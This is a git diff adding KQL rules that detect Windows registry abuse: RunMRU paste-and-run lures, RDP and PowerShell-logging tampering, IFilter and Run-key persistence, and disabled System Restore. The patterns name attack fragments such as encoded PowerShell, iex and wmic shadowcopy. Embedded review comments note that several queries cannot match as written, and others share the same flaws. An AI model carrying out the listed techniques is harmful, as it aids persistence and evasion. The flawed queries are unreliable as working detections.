diff --git a/KQL/rules/windows/registry/registry_set/potential_werfault_reflectdebugger_registry_value_abuse.kql b/KQL/rules/windows/registry/registry_set/potential_werfault_reflectdebugger_registry_value_abuse.kql
new file mode 100644
index 00000000..b368d77c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potential_werfault_reflectdebugger_registry_value_abuse.kql
@@ -0,0 +1,10 @@
+// Title: Potential WerFault ReflectDebugger Registry Value Abuse
+// Author: X__Junior
+// Date: 2023-05-18
+// Level: high
+// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
new file mode 100644
index 00000000..c557a628
--- /dev/null
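Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` is Sysmon's textual rendering of a DWORD in its Details field; in DeviceRegistryEvents the data column carries the value as a plain string such as `1` with `RegistryValueType` set to `Dword`, so this comparison is unlikely to match any real MDE event — confirm against a live record before relying on it. A safer form is `RegistryValueType =~ "Dword" and RegistryValueData =~ "1"`. The same `DWORD (0x...)` literal is used in the Desktop Background, PowerShell Logging Disabled, Script Execution Policy Enabled, Python Function Warnings and both RDP Sensitive Settings hunks below (including the `DWORD (0x00000000)` and `in~` variants), so mapping it once in the conversion would fix all of them.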
+++ b/KQL/rules/windows/registry/registry_set/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql
@@ -0,0 +1,11 @@
+// Title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry
+// Author: Ahmed Farouk, Nasreddine Bencherchali
+// Date: 2024-11-01
+// Level: high
+// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
+// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (((RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and (RegistryValueData contains " -e " or RegistryValueData contains " -ec " or RegistryValueData contains " -en " or RegistryValueData contains " -enc " or RegistryValueData contains " -enco" or RegistryValueData contains "ftp" or RegistryValueData contains "Hidden" or RegistryValueData contains "http" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-")) or (RegistryValueData contains "wmic" and (RegistryValueData contains "shadowcopy" or RegistryValueData contains "process call create")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potentially_suspicious_desktop_background_change_via_registry.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_desktop_background_change_via_registry.kql
new file mode 100644
index 00000000..95eb3ee2
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potentially_suspicious_desktop_background_change_via_registry.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious Desktop Background Change Via Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
+// Date: 2023-12-21
+// Level: medium
+// Description: Detects registry value settings that would replace the user's desktop background.
+// This is a common technique used by malware to change the desktop background to a ransom note or other image.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001
+// False Positives:
+// - Administrative scripts that change the desktop background to a company logo or other image.
+
+DeviceRegistryEvents
+| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(((RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper") or InitiatingProcessFolderPath endswith "C:\\Windows\\Explorer.EXE" or InitiatingProcessFolderPath endswith "\\svchost.exe"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Amazon\\EC2Launch\\EC2Launch.exe", "C:\\Program Files (x86)\\Amazon\\EC2Launch\\EC2Launch.exe")) and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/potentially_suspicious_odbc_driver_registered.kql b/KQL/rules/windows/registry/registry_set/potentially_suspicious_odbc_driver_registered.kql
new file mode 100644
index 00000000..243c576f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/potentially_suspicious_odbc_driver_registered.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious ODBC Driver Registered
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: high
+// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.persistence, attack.t1003
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData contains ":\\PerfLogs\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Registration\\CRMLog" or RegistryValueData contains ":\\Windows\\System32\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\System32\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\drivers\\color\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\PRINTERS\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\SERVERS\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks_Migrated\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\Tasks\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains ":\\Windows\\Tracing\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\") and RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and (RegistryKey endswith 
"\\Driver" or RegistryKey endswith "\\Setup") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/powershell_as_a_service_in_registry.kql b/KQL/rules/windows/registry/registry_set/powershell_as_a_service_in_registry.kql new file mode 100644 index 00000000..72677325 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/powershell_as_a_service_in_registry.kql @@ -0,0 +1,10 @@ +// Title: PowerShell as a Service in Registry +// Author: oscd.community, Natalia Shornikova +// Date: 2020-10-06 +// Level: high +// Description: Detects that a powershell code is written to the registry as a service. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1569.002 + +DeviceRegistryEvents +| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and RegistryKey endswith "\\Services*" and RegistryKey endswith "\\ImagePath" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql b/KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql new file mode 100644 index 00000000..ff2eeb02 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/powershell_logging_disabled_via_registry_key_tampering.kql 
@@ -0,0 +1,10 @@
+// Title: PowerShell Logging Disabled Via Registry Key Tampering
+// Author: frack113
+// Date: 2022-04-02
+// Level: high
+// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001, attack.t1112, attack.persistence
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\PowerShell*" or RegistryKey endswith "\\Microsoft\\PowerShellCore*") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/powershell_script_execution_policy_enabled.kql b/KQL/rules/windows/registry/registry_set/powershell_script_execution_policy_enabled.kql
new file mode 100644
index 00000000..dd078f85
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/powershell_script_execution_policy_enabled.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Script Execution Policy Enabled
+// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo
+// Date: 2023-10-18
+// Level: low
+// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Likely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql b/KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql
new file mode 100644
index 00000000..5bc3bd52
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/pua_sysinternal_tool_execution_registry.kql
@@ -0,0 +1,13 @@
+// Title: PUA - Sysinternal Tool Execution - Registry
+// Author: Markus Neis
+// Date: 2017-08-28
+// Level: low
+// Description: Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Legitimate use of SysInternals tools
+// - Programs that use the same Registry Key
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql b/KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql
new file mode 100644
index 00000000..d0b04e6a
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/pua_sysinternals_tools_execution_registry.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Sysinternals Tools Execution - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: medium
+// Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\SDelete" or RegistryKey contains "\\Sysinternals") and RegistryKey endswith "\\EulaAccepted"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/python_function_execution_security_warning_disabled_in_excel_registry.kql b/KQL/rules/windows/registry/registry_set/python_function_execution_security_warning_disabled_in_excel_registry.kql
new file mode 100644
index 00000000..4ebc73f4
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/python_function_execution_security_warning_disabled_in_excel_registry.kql
@@ -0,0 +1,11 @@
+// Title: Python Function Execution Security Warning Disabled In Excel - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale
+// Date: 2024-08-23
+// Level: high
+// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
+// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Security\\PythonFunctionWarnings"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql
new file mode 100644
index 00000000..13ad8c41
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed.kql
@@ -0,0 +1,22 @@
+// Title: RDP Sensitive Settings Changed
+// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
+// Date: 2022-08-06
+// Level: high
+// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
+// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
+// Below is a list of registry keys/values that are monitored by this rule:
+// - Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.
+// - DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.
+// - DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.
+// - fAllowUnsolicited: Allows unsolicited remote assistance offers.
+// - fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.
+// - InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.
+// - ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.
+// - SecurityLayer: Specifies the security layer used for RDP connections.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+// False Positives:
+// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
+
+DeviceRegistryEvents
+| where (((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\SecurityLayer" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")) and (not((RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SecurityLayer")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed_to_zero.kql b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed_to_zero.kql
new file mode 100644
index 00000000..c6a6d953
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/rdp_sensitive_settings_changed_to_zero.kql
@@ -0,0 +1,13 @@
+// Title: RDP Sensitive Settings Changed to Zero
+// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
+// Date: 2022-09-29
+// Level: medium
+// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
+// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+// False Positives:
+// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/register_new_ifiltre_for_persistence.kql b/KQL/rules/windows/registry/registry_set/register_new_ifiltre_for_persistence.kql
new file mode 100644
index 00000000..3b97c86d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/register_new_ifiltre_for_persistence.kql
@@ -0,0 +1,13 @@ +// Title: Register New IFiltre For Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. +// You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate registration of IFilters by the OS or software + +DeviceRegistryEvents +| where ((RegistryKey contains "\\SOFTWARE\\Classes\\CLSID" and RegistryKey contains "\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}") or (RegistryKey contains "\\SOFTWARE\\Classes\\." and RegistryKey contains "\\PersistentHandler")) and (not(((RegistryKey endswith "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}*" or RegistryKey endswith "\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}*" or RegistryKey endswith "\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}*" or RegistryKey endswith "\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}*" or RegistryKey endswith "\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}*" or RegistryKey endswith "\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}*" or RegistryKey endswith "\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}*" or RegistryKey endswith "\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}*" or RegistryKey endswith "\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}*" or RegistryKey endswith "\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}*" or RegistryKey endswith 
"\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}*" or RegistryKey endswith "\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}*" or RegistryKey endswith "\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}*" or RegistryKey endswith "\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}*" or RegistryKey endswith "\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}*" or RegistryKey endswith "\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}*" or RegistryKey endswith "\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}*" or RegistryKey endswith "\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}*" or RegistryKey endswith "\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}*" or RegistryKey endswith "\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}*" or RegistryKey endswith "\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}*" or RegistryKey endswith "\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}*" or RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}" or RegistryKey endswith "\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/registry_disable_system_restore.kql b/KQL/rules/windows/registry/registry_set/registry_disable_system_restore.kql new file mode 100644 index 00000000..52c1a66f --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/registry_disable_system_restore.kql 
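Review bot: The CLSID allowlist inside the `not(...)` uses `RegistryKey endswith "\\CLSID\\{...}*"` with a literal trailing asterisk, and KQL `endswith` does not treat `*` as a wildcard, so none of those exclusions can ever match and only the `InitiatingProcessFolderPath startswith` branch actually suppresses noise. The one entry written as `RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}"` is the form that works; the rest should be converted the same way, e.g. `RegistryKey contains "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}"`. Until that is done, IFilter registrations by third-party installers outside Program Files will alert even when they are the known-good Microsoft handlers the Sigma rule meant to allow.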
@@ -0,0 +1,10 @@
+// Title: Registry Disable System Restore
+// Author: frack113
+// Date: 2022-04-04
+// Level: high
+// Description: Detects the modification of the registry to disable a system restore on the computer
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore") and (RegistryKey endswith "DisableConfig" or RegistryKey endswith "DisableSR")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/registry_explorer_policy_modification.kql b/KQL/rules/windows/registry/registry_set/registry_explorer_policy_modification.kql
new file mode 100644
index 00000000..cf0c28fe
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/registry_explorer_policy_modification.kql
@@ -0,0 +1,12 @@ +// Title: Registry Explorer Policy Modification +// Author: frack113 +// Date: 2022-03-18 +// Level: medium +// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/registry_hide_function_from_user.kql b/KQL/rules/windows/registry/registry_set/registry_hide_function_from_user.kql new file mode 100644 index 00000000..085d597f --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/registry_hide_function_from_user.kql 
@@ -0,0 +1,12 @@ +// Title: Registry Hide Function from User +// Author: frack113 +// Date: 2022-03-18 +// Level: medium +// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents +| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume")) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql b/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql new file mode 100644 index 00000000..95e35eea --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql 
@@ -0,0 +1,13 @@ +// Title: Registry Modification for OCI DLL Redirection +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2026-01-24 +// Level: high +// Description: Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings. +// Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious DLL, facilitating phantom DLL hijacking via the MSDTC service. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1112, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLib" and (not(RegistryValueData contains "oci.dll"))) or (RegistryKey endswith "\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLibPath" and (not(RegistryValueData contains "%SystemRoot%\\System32\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/registry_modification_to_hidden_file_extension.kql b/KQL/rules/windows/registry/registry_set/registry_modification_to_hidden_file_extension.kql new file mode 100644 index 00000000..87dfa661 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/registry_modification_to_hidden_file_extension.kql 
@@ -0,0 +1,12 @@ +// Title: Registry Modification to Hidden File Extension +// Author: frack113 +// Date: 2022-01-22 +// Level: medium +// Description: Hides the file extension through modification of the registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137 +// False Positives: +// - Administrative scripts + +DeviceRegistryEvents +| where (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/registry_persistence_via_explorer_run_key.kql b/KQL/rules/windows/registry/registry_set/registry_persistence_via_explorer_run_key.kql new file mode 100644 index 00000000..865f2147 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/registry_persistence_via_explorer_run_key.kql @@ -0,0 +1,10 @@ +// Title: Registry Persistence via Explorer Run Key +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2018-07-18 +// Level: high +// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents +| where (RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" \ No newline at end of file 
